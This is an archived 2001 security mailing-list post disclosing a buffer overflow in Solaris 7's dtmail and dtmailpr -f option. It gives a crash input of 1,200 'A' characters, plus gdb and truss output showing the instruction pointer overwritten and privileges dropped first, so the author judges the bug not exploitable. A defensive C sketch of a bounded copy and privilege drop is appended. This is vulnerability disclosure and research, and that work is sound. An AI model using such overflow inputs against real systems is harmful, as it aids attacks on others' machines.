Solaris 7 /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr "-f" option buffer overflow

From: ARAI Yuu (y.araiat_private)
Date: Thu Nov 08 2001 - 22:20:31 PST

    Hi there,
    
    I've found that /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr will cause a buffer
    overflow on Solaris 7. /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr are
    installed as SGID mail. Unfortunately, these are NOT exploitable,
    because it seems that /usr/dt/bin/dtmail and /usr/dt/bin/dtmailpr
    drop privileges before the overflow occurs.
    
    
    bash-2.03$ ls -la /usr/dt/bin/dtmail /usr/dt/bin/dtmailpr
    -r-xr-sr-x   1 bin      mail     1490924 Oct 31 08:59 /usr/dt/bin/dtmail
    -r-xr-sr-x   1 bin      mail      531732 Oct 31 08:59 /usr/dt/bin/dtmailpr
    bash-2.03$ uname -a
    SunOS puppet 5.7 Generic_106542-18 i86pc i386 i86pc
    bash-2.03$ /usr/dt/bin/dtmail -f `perl -e 'print "A"x1200'`
    Segmentation Fault
    bash-2.03$ cp /usr/dt/bin/dtmail ./
    bash-2.03$ ./dtmail -f `perl -e 'print "A"x1200'`
    Segmentation Fault (core dumped)
    bash-2.03$ gdb ./dtmail --core=core
    GNU gdb 4.18
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-pc-solaris2.7"...
    (no debugging symbols found)...
    Core was generated by `./dtmail -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 9, Killed.
    Reading symbols from /usr/dt/lib/libSDtMail.so.2...
    (no debugging symbols found)...done.
    Reading symbols from /usr/lib/libnsl.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/lib/libsocket.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/dt/lib/libDtSvc.so.1...
    (no debugging symbols found)...done.
    Reading symbols from /usr/dt/lib/libtt.so.2...(no debugging symbols found)...
    done.
    Reading symbols from /usr/dt/lib/libDtWidget.so.2...
    (no debugging symbols found)...done.
    ---Type <return> to continue, or q <return> to quit---
    Reading symbols from /usr/dt/lib/libXm.so.4...(no debugging symbols found)...
    done.
    Reading symbols from /usr/openwin/lib/libXt.so.4...
    (no debugging symbols found)...done.
    Reading symbols from /usr/openwin/lib/libX11.so.4...
    (no debugging symbols found)...done.
    Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libC.so.5...(no debugging symbols found)...done.
    Reading symbols from /usr/dt/lib/libSDtFwa.so.1...
    (no debugging symbols found)...done.
    Reading symbols from /usr/lib/libm.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libw.so.1...
    warning: Lowest section in /usr/lib/libw.so.1 is .hash at 0x74
    (no debugging symbols found)...done.
    Reading symbols from /usr/lib/libthread.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libmp.so.2...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libgen.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/openwin/lib/libSM.so.6...
    (no debugging symbols found)...done.
    Reading symbols from /usr/openwin/lib/libICE.so.6...
    (no debugging symbols found)...done.
    Reading symbols from /usr/openwin/lib/libXext.so.0...
    ---Type <return> to continue, or q <return> to quit---
    (no debugging symbols found)...done.
    #0  0x41414141 in ?? ()
    (gdb) info r
    eax            0x0      0
    ecx            0x4e     78
    edx            0x0      0
    ebx            0x81e2688        136193672
    esp            0x8045c84        0x8045c84
    ebp            0x41414141       0x41414141
    esi            0x8162d88        135671176
    edi            0x81e1990        136190352
    eip            0x41414141       0x41414141
    eflags         0x10286  66182
    cs             0x17     23
    ss             0x1f     31
    ds             0x1f     31
    es             0x1f     31
    fs             0x0      0
    gs             0x10f    271
    (gdb) q
    bash-2.03$ su
    Password:
    # truss -t'!all' -u libc:getgid,setgid /usr/dt/bin/dtmail -f \
    `/usr/local/bin/perl -e 'print "A"x1200'`
    /1:     -> libc:getgid()
    /1:     <- libc:getgid() = 1
    /1:     -> libc:setgid(0x1)
    /1:     <- libc:setgid() = 0
    /1:     -> libc:setgid(0x6)
    /1:     <- libc:setgid() = 0
    /1:     -> libc:setgid(0x1)
    /1:     <- libc:setgid() = 0
        Incurred fault #6, FLTBOUNDS  %pc = 0x41414141
          siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
        Received signal #11, SIGSEGV [default]
          siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
            *** process killed ***
    
    You'll see the same result with dtmailpr.
    It should be noted that dtmail and dtmailpr on Solaris 8 will not
    cause this overflow.
    
    Regards,
    -----------------------------------------------
    ARAI Yuu <y.araiat_private>
    Network Security Specialist / LAC Computer Security Laboratory
    http://www.lac.co.jp/security/
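As an added illustration (not dtmail's source, which the post does not show), this C sketch models the two defences the report implies: a bounded copy of the `-f` argument in place of an unchecked copy into a fixed buffer, and a verified drop of the SGID group before any argv is parsed, which is the ordering the truss output above shows saving dtmail from being exploitable. `FOLDER_MAX`, the function names and the 'A'-string helper are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define FOLDER_MAX 256   /* assumed buffer size; dtmail's real size is not on the page */

/* Bounded replacement for an unchecked strcpy() of the "-f" argument.
 * Refuses over-long names instead of truncating silently.
 * Returns 0 on success, -1 if arg (plus its NUL) does not fit in dst. */
int set_folder_checked(char *dst, size_t dstsz, const char *arg) {
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Drop an SGID group before any untrusted argv is parsed, and verify the
 * drop took effect rather than trusting setgid()'s return value alone.
 * Returns 0 when the effective gid equals the real gid afterwards. */
int drop_sgid_privileges(void) {
    gid_t real = getgid();
    if (setgid(real) != 0)
        return -1;
    return (getegid() == real) ? 0 : -1;
}

/* Builds an argument of n 'A' bytes, as the post's perl one-liner does, and
 * reports whether the bounded copy accepts it (0) or rejects it (-1). */
int try_folder_of_length(size_t n) {
    char folder[FOLDER_MAX];
    char *arg = malloc(n + 1);
    if (arg == NULL)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    int rc = set_folder_checked(folder, sizeof folder, arg);
    free(arg);
    return rc;
}

int main(void) {
    if (drop_sgid_privileges() != 0)
        return 2;                          /* never parse input while still SGID */
    printf("1200 x 'A' rejected: %s\n", try_folder_of_length(1200) == -1 ? "yes" : "no");
    return 0;
}
```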
    



    This archive was generated by hypermail 2b30 : Fri Nov 09 2001 - 00:33:04 PST